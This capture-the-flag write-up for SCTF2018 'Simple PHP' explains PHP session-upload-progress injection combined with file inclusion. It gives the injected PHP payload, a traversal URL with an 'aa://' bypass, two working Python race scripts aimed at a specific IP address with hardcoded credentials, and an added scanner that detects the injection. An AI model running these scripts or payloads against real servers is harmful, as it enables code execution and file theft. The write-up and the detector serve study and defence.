session upload get shell

Using SCTF2018 BabySyc - Simple PHP as the example.

Official solution:
https://www.cnblogs.com/iamstudy/articles/sctf2018_simple_php_web_writeup.html

The session upload route is an unintended solution.
A few reference links on session upload:
https://xz.aliyun.com/t/2148
http://php.net/manual/zh/session.upload-progress.php
http://skysec.top/2018/04/04/amazing-phpinfo/


Read phpinfo through the file inclusion:

http://116.62.71.206:52872/?f=phpinfo.php


session.upload_progress.enabled = On is set, which means the session file can be overwritten with client-supplied content.
session.upload_progress.cleanup is also on, so the progress entry is removed as soon as the upload finishes and the include has to be raced against the upload.
The race scripts are attached at the bottom.


The session content that actually gets included here is:

admin|i:1;upload_progress_<?php echo file_get_contents("/tmp/flag_56CcE97QGNxDEXNpW3HY");?>|a:5:{s:10:"start_time";i:1529519759;s:14:"content_length";i:90736;s:15:"bytes_processed";i:5291;s:4:"done";b:0;s:5:"files";a:1:{i:0;a:7:{s:10:"field_name";s:6:"upload";s:4:"name";s:7:"tmp.jpg";s:8:"tmp_name";N;s:5:"error";i:0;s:4:"done";b:0;s:10:"start_time";i:1529519759;s:15:"bytes_processed";i:0;}}}
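The session line above is exactly what a responder would find on disk after this kind of upload: the attacker-chosen value of the PHP_SESSION_UPLOAD_PROGRESS field becomes the tail of the upload_progress_ key, and the key sits in a plain-data file that a file inclusion will happily parse. The following Python script is an added example for this writeup (not the author's code): it pulls the client-controlled key suffixes out of a session file in PHP's default serializer format, flags any that contain PHP open tags, and explains what the enabled/cleanup settings read from phpinfo() imply. The injected sample is the writeup's own session content re-typed as a constructed string; the benign sample and the php.ini values are assumptions for illustration.

```python
"""Spot session.upload_progress abuse in PHP session files and php.ini.

Added example for this writeup (not the author's code): a defender's
counterpart to the race described above. The injected session blob is
re-typed from the writeup as a constructed sample; the benign sample and
the php.ini values are assumptions for illustration.
"""
import re
from typing import Dict, List

# With session.upload_progress.enabled = On, PHP stores upload status under
#   <session.upload_progress.prefix> + <value of the PHP_SESSION_UPLOAD_PROGRESS field>
# The default prefix is "upload_progress_"; the suffix is whatever the client sent.
DEFAULT_PREFIX = "upload_progress_"

# A PHP open tag inside session data is a red flag: session files hold data,
# never code.
PHP_TAG = re.compile(r"<\?(?:php|=)?", re.I)


def upload_progress_keys(session_blob: str, prefix: str = DEFAULT_PREFIX) -> List[str]:
    """Return the client-supplied suffix of every upload_progress key.

    The default "php" serializer writes top-level entries as key|value, so the
    suffix runs from the prefix up to the '|' that precedes the serialized
    value (array 'a:', string 's:', int 'i:', bool 'b:', float 'd:',
    object 'O:'/'C:' or null 'N;').
    """
    pattern = re.compile(re.escape(prefix) + r"(.*?)\|(?=[asibdOCN][:;])", re.S)
    return [m.group(1) for m in pattern.finditer(session_blob)]


def scan_session(session_blob: str, prefix: str = DEFAULT_PREFIX) -> Dict[str, object]:
    """Summarise what a responder wants to know about one session file."""
    keys = upload_progress_keys(session_blob, prefix)
    return {
        "upload_progress_keys": keys,
        "keys_with_php_tags": [k for k in keys if PHP_TAG.search(k)],
        "php_tag_anywhere": PHP_TAG.search(session_blob) is not None,
    }


def _is_on(value: str) -> bool:
    return value.strip().lower() in ("1", "on", "true", "yes")


def assess_ini(settings: Dict[str, str]) -> List[str]:
    """Explain the exposure implied by the upload_progress settings (PHP defaults: both On)."""
    findings: List[str] = []
    enabled = _is_on(settings.get("session.upload_progress.enabled", "1"))
    cleanup = _is_on(settings.get("session.upload_progress.cleanup", "1"))
    if not enabled:
        return findings
    findings.append(
        "session.upload_progress.enabled=On: any multipart POST carrying a "
        "PHP_SESSION_UPLOAD_PROGRESS field writes client-chosen text into the "
        "session file; combined with a file inclusion that is code execution. "
        "Set it to Off unless upload progress bars are needed."
    )
    if cleanup:
        findings.append(
            "session.upload_progress.cleanup=On: the entry is removed when the upload "
            "finishes, so abuse needs a race between the upload and the include."
        )
    else:
        findings.append(
            "session.upload_progress.cleanup=Off: the entry persists after the upload, "
            "so no race is needed; turn cleanup back on."
        )
    return findings


# Constructed samples: the first is the session content shown in the writeup,
# the second is what a legitimate progress-bar upload would leave behind.
INJECTED_SESSION = (
    'admin|i:1;upload_progress_<?php echo file_get_contents("/tmp/flag_56CcE97QGNxDEXNpW3HY");?>'
    '|a:5:{s:10:"start_time";i:1529519759;s:14:"content_length";i:90736;'
    's:15:"bytes_processed";i:5291;s:4:"done";b:0;s:5:"files";a:1:{i:0;a:7:{'
    's:10:"field_name";s:6:"upload";s:4:"name";s:7:"tmp.jpg";s:8:"tmp_name";N;'
    's:5:"error";i:0;s:4:"done";b:0;s:10:"start_time";i:1529519759;'
    's:15:"bytes_processed";i:0;}}}'
)
BENIGN_SESSION = 'admin|i:1;upload_progress_myform|a:1:{s:4:"done";b:1;}'

# Assumed php.ini values matching what the writeup read from phpinfo().
CHALLENGE_INI = {
    "session.upload_progress.enabled": "On",
    "session.upload_progress.cleanup": "On",
}

if __name__ == "__main__":
    for label, blob in (("injected", INJECTED_SESSION), ("benign", BENIGN_SESSION)):
        print(label, scan_session(blob))
    for line in assess_ini(CHALLENGE_INI):
        print("-", line)
```

Running it over a directory of sess_* files is a one-line loop around scan_session; the benign sample shows that a real progress-bar form name does not trip the check, only a suffix carrying a PHP open tag does.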

Pitfalls encountered

The challenge uses a .so to encrypt and decrypt its PHP: the file inclusion loads the encrypted index.php, so anything included also has to be encrypted PHP code. The session, however, only gives control over <?php echo file_get_contents("/tmp/flag_56CcE97QGNxDEXNpW3HY");?>; at best that single fragment of the session could be encrypted, and the rest of the session content, being unencrypted, would still make decryption fail.

Luckily, so that players could use PHP stream wrappers, the challenge left a "backdoor" that hands the file straight to the PHP parser without the encryption step; it only checks for the substring ://


So a payload can bypass the encrypt/decrypt step: include the session file and have it parsed directly as PHP.

http://116.62.71.206:52872/?f=aa://../../../../var/lib/php/sessions/sess_qc2kavokdjiiepu283hduivod2


SessionUpload.py

#!coding:utf-8
import requests
import time

url = 'http://116.62.71.206:52872/?f=login.php'
data = {'name': 'admin', 'pass': 'sctf2018_h656cDBkU2'}

# log in once to obtain a session id; the same session is kept for every upload
r = requests.post(url, data=data)
PHPSESSID = r.cookies['PHPSESSID']
print('input the PHPSESSID in include.py' + '\n' + PHPSESSID)
time.sleep(10)

while True:
    url = 'http://116.62.71.206:52872/?f=upload_sctf2018_C9f7y48M75.php'
    with open("tmp.png", "rb") as fh:
        files = {
            # the value of this field becomes the suffix of the upload_progress_ session key
            "PHP_SESSION_UPLOAD_PROGRESS": (None, '<?php echo file_get_contents("/tmp/flag_56CcE97QGNxDEXNpW3HY");?>'),
            "upload": ("tmp.jpg", fh, "image/png"),
            "submit": (None, "submit")
        }
        #proxies = {'http':'http://127.0.0.1:8080'}
        headers = {'Cookie': 'PHPSESSID=' + PHPSESSID}
        r = requests.post(url, files=files, headers=headers)
    print(r.text)
    print(PHPSESSID)
    # cleanup is on, so keep racing while holding the same session

include.py

#!coding:utf-8

import requests

# paste the PHPSESSID printed by SessionUpload.py here
PHPSESSID = 'qc2kavokdjiiepu283hduivod2'
while True:
    # the aa:// scheme only has to contain "://" to reach the unencrypted parse path
    url = 'http://116.62.71.206:52872/?f=aa://../../../../var/lib/php/sessions/sess_' + PHPSESSID
    print(url)
    r = requests.get(url)
    if 'SCTF' in r.text:
        print(r.text)
        break